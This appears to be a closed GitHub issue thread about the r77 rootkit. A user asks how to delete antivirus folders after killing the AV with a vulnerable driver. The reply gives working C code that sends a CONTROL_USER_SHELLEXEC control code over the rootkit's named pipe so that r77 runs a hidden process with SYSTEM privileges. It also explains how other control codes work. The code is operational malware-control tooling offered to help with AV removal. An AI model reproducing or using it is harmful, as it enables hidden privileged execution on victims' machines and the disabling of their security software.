Closed KRAFMA closed 9 months ago
There's no need to modify r77 itself to achieve that. Once r77 is installed & running, you can communicate with the rootkit service through a named pipe. When you send CONTROL_USER_SHELLEXEC
, r77 executes a file with SYSTEM privileges fo you - and that executable should delete those files, etc.
There are more control codes, see the documentation for an exhaustive list. Here is an example of how to use one particular control code.
Look at the example in ControlPipe.cpp
#include <Windows.h>
// This example demonstrates how to make r77 perform a ShellExecute.
// All other control codes work similarly.
#define CONTROL_USER_SHELLEXEC 0x3001 // These constants can be found in r77def.h or in the technical documentation
int main()
{
// Connect to the r77 service. The rootkit must be installed.
HANDLE pipe = CreateFileW(L"\\\\.\\pipe\\$77control", GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, 0, NULL);
if (pipe != INVALID_HANDLE_VALUE)
{
DWORD controlCode = CONTROL_USER_SHELLEXEC;
WCHAR shellExecPath[] = L"C:\\Windows\\System32\\notepad.exe";
WCHAR shellExecCommandline[] = L"mytextfile.txt";
// Write control code (DWORD)
DWORD bytesWritten;
WriteFile(pipe, &controlCode, sizeof(DWORD), &bytesWritten, NULL);
// Write the path for ShellExec (unicode string including null terminator)
WriteFile(pipe, shellExecPath, (lstrlenW(shellExecPath) + 1) * 2, &bytesWritten, NULL);
// Write arguments for ShellExec
WriteFile(pipe, shellExecCommandline, (lstrlenW(shellExecCommandline) + 1) * 2, &bytesWritten, NULL);
// Now, a new process "notepad.exe mytextfile.txt" will spawn.
// You will only see it in TaskMgr. Because this process is running under the SYSTEM user, it does not show up on the desktop.
// Use the Test Console to try out different control codes.
CloseHandle(pipe);
}
return 0;
}
Closed due to inactivity.
Hello man ,
You think it is possible to do a simple poc or add on your r77 any code to force the deletion of a file/folder (example, I can kill some Av with a vuln driver) but the best would be to delete the installation folder after killing